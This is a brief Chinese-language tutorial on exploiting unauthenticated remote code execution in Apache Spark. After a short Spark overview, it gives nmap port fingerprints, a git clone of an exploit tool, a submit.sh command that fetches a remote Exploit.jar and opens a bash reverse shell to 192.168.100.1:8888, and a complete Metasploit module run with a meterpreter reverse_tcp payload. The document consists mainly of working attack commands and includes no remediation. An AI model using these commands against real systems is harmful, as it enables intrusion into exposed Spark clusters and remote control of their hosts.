spark未授权RCE漏洞

Spark简介

---

---

spark是一个实现快速通用的集群计算平台。它是由加州大学伯克利分校AMP实验室 开发的通用内存并行计算框架，用来构建大型的、低延迟的数据分析应用程序。它扩展了广泛使用的MapReduce计算模型。高效的支撑更多计算模式，包括交互式查询和流处理。spark的一个主要特点是能够在内存中进行计算，及时依赖磁盘进行复杂的运算，Spark依然比MapReduce更加高效。

Spark未授权

---

---

信息探测

---

nmap扫描出先如下端口开放，则很有可能

6066/tcp open http Jetty 9.3.z-SNAPSHOT 8081/tcp open http Jetty 9.3.z-SNAPSHOT 8082/tcp open http Jetty 9.3.z-SNAPSHOT 

验证如图

下载攻击组件或使用MSF

---

下载地址:git clone https://github.com/aRe00t/rce-over-spark.git

jar工具使用说明

---

./submit.sh 192.168.100.2：6066 2.3.1 https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar "bash -i >& /dev/tcp/192.168.100.1/8888 0>&1" 

反弹shell效果：

msf工具

---

msf5>use exploit/linux/http/spark_unauth_rce msf5>set payload java/meterpreter/reverse_tcp msf5>set rhost 192.168.100.2 msf5>set rport 6066 msf5>set lhost 192.168.100.1 msf5>set lport 4444 msf5>set srvhost 192.168.100.1 msf5>set srvport 8080 msf5>exploit